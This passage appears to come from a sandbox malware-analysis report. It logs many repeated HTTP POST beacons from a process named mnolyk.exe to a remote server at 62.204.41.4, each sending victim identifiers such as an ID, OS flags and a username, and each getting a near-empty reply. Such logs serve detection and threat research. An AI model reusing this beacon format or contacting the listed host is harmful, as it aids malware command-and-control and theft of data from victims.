                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:36.461721897 CET | 670 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
471 | 192.168.2.3 | 50174 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:36.644072056 CET | 671 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:36.708138943 CET | 671 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
472 | 192.168.2.3 | 50175 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:36.875659943 CET | 672 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:36.942636967 CET | 672 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
473 | 192.168.2.3 | 50176 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:37.109603882 CET | 673 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:37.178168058 CET | 673 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
474 | 192.168.2.3 | 50177 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:37.364650965 CET | 674 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:37.431649923 CET | 674 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
475 | 192.168.2.3 | 50178 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:37.609951019 CET | 675 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:37.674874067 CET | 675 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
476 | 192.168.2.3 | 50179 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:37.860729933 CET | 676 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:37.925077915 CET | 676 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
477 | 192.168.2.3 | 50180 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:38.094943047 CET | 677 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:38.160731077 CET | 677 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
478 | 192.168.2.3 | 50181 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:38.330595970 CET | 678 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:38.395766973 CET | 678 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
479 | 192.168.2.3 | 50182 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:38.560889959 CET | 679 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:38.623030901 CET | 679 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
48 | 192.168.2.3 | 49750 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:31:28.669504881 CET | 249 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:31:28.733625889 CET | 249 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
480 | 192.168.2.3 | 50183 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:38.796160936 CET | 680 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:38.859824896 CET | 680 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
481 | 192.168.2.3 | 50184 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:39.029652119 CET | 681 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:39.094435930 CET | 681 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
482 | 192.168.2.3 | 50185 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:39.263108015 CET | 682 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:39.326050043 CET | 682 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
483 | 192.168.2.3 | 50186 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:39.504951000 CET | 683 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:39.570188999 CET | 683 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    484 | 192.168.2.3 | 50187 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:39.749922991 CET | 684 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:39.813281059 CET | 684 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    485 | 192.168.2.3 | 50188 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:39.982940912 CET | 685 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:40.048501015 CET | 685 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    486 | 192.168.2.3 | 50189 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:40.218272924 CET | 686 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:40.283301115 CET | 686 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    487 | 192.168.2.3 | 50190 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:40.457307100 CET | 687 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:40.522316933 CET | 687 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    488 | 192.168.2.3 | 50191 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:40.706397057 CET | 688 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
